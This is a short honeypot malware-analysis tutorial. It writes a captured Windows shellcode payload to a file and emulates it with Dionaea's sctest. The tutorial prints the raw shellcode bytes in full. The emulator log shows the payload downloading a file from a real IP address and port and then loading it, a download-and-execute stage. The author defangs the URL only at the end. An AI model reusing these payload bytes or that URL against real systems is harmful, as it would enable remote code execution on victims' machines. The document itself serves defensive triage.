For this analysis, we’ll using Python3 that bundled with Dionaea:
/opt/dionaea/bin/python3
Running command above will open a Python console. Enter the code below line by line:
f = open('/tmp/test.bin','wb+') f.write(b'\\\x00EJinvSWwBRCQvkpxpigFPYgLEznJUFvXdgKGNqynVDlchFrVWzDhuvssAiCzTVCXwMERZNFfiqOpAyLjJojswpKHzIwBaYQMAxYe\xe8\xff\xff\xff\xff\xc2_\x8dO\x10\x801\xc4Af\x819MSu\xf58\xae\xc6\x9d\xa0O\x85\xeaO\x84\xc8O\x84\xd8O\xc4O\x9c\xccIse\xc4\xc4\xc4,\xed\xc4\xc4\xc4\x94&<O8\x92;\xd3WG\x02\xc3,\xdc\xc4\xc4\xc4\xf7\x16\x96\x96O\x08\xa2\x03\xc5\xbc\xea\x95;\xb3\xc0\x96\x96\x95\x92\x96;\xf3;$i\x95\x92QO\x8f\xf8O\x88\xcf\xbc\xc7\x0f\xf72I\xd0w\xc7\x95\xe4O\xd6\xc7\x17\xcb\xc4\x04\xcb{\x04\x05\x04\xc3\xf6\xc6\x86D\xfe\xc4\xb11\xff\x01\xb0\xc2\x82\xff\xb5\xdc\xb6\x1fO\x95\xe0\xc7\x17\xcbs\xd0\xb6O\x85\xd8\xc7\x07O\xc0T\xc7\x07\x9a\x9d\x07\xa4fN\xb2\xe2Dh\x0c\xb1\xb6\xa8\xa9\xab\xaa\xc4]\xe7\x99\x1d\xac\xb0\xb0\xb4\xfe\xeb\xeb\xf5\xfc\xfc\xea\xf6\xf0\xf1\xea\xf7\xf6\xea\xf6\xf5\xf4\xfe\xfc\xf5\xf0\xf3\xeb\xaf\xa7\xa2\xa8\xc4MSemnHqZkZyHIFmbZQCywHscutahhWhoSewiPdNFaPfofpeZVQgyybFqBlGSeBYAPgirfoIOMFQCVIOhuNxscDcxyqJfxgMhahsgjEvYZWarkAkGUWFEWHrnRvYCubVUJnOgsKyupLJGkVCRQwYGcQPSuIsYJmBSVIcLnDXRxnDOkAvmXjHktND\\\x00.\x00.\x00\\\x00.\x00.\x00\\\x00A\x00I\x00O\x00J\x00L\x00P\x00D\x00\x08\x04\x02\x00$\xcb\x01xVFAS$\xcb\x01xSNKBQTVPYYTZISATHHFZEPMNQBWWBDGZDXJNVJAZLX\x92J$\xb6\x97\x03\xf57\xebZRQNXKFGQWT\x00\x00') f.close() exit()
It will produce test.bin file in /tmp/ folder.
Now we analyze the file test.bin using sctest and dump the output into test.txt:
/opt/dionaea/bin/sctest -S -g -v -s 1000000 < /tmp/test.bin >> test.txt
If you see inside test.txt, you should see something like this:
root@box:~# cat test.txt verbose = 1 success offset = 0x00000068 [emu 0x0xac40e0 info ] The following function is a stub instr_sldt_0f00 functions/misc.c:290 <snip> Hook me Captain Cook! userhooks.c:132 user_hook_ExitThread ExitThread(0) stepcount 85067 HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x00417116 => = "urlmon"; ) = 0x7df20000; HRESULT URLDownloadToFile ( LPUNKNOWN pCaller = 0x00000000 => none; LPCTSTR szURL = 0x00417121 => = "http://188.245.32.210:8147/kcfl"; LPCTSTR szFileName = 0x00416fbe => = "x."; DWORD dwReserved = 0; LPBINDSTATUSCALLBACK lpfnCB = 0; ) = 0; HMODULE LoadLibraryA ( LPCTSTR lpFileName = 0x00416fbe => = "x."; ) = 0x00000000; void ExitThread ( DWORD dwExitCode = 0; ) = 0;
As you can see, the malicious URL is hxxp://188.245.32.210:8147/kcfl
Reference: https://sourceforge.net/p/nepenthes/mailman/message/26862416/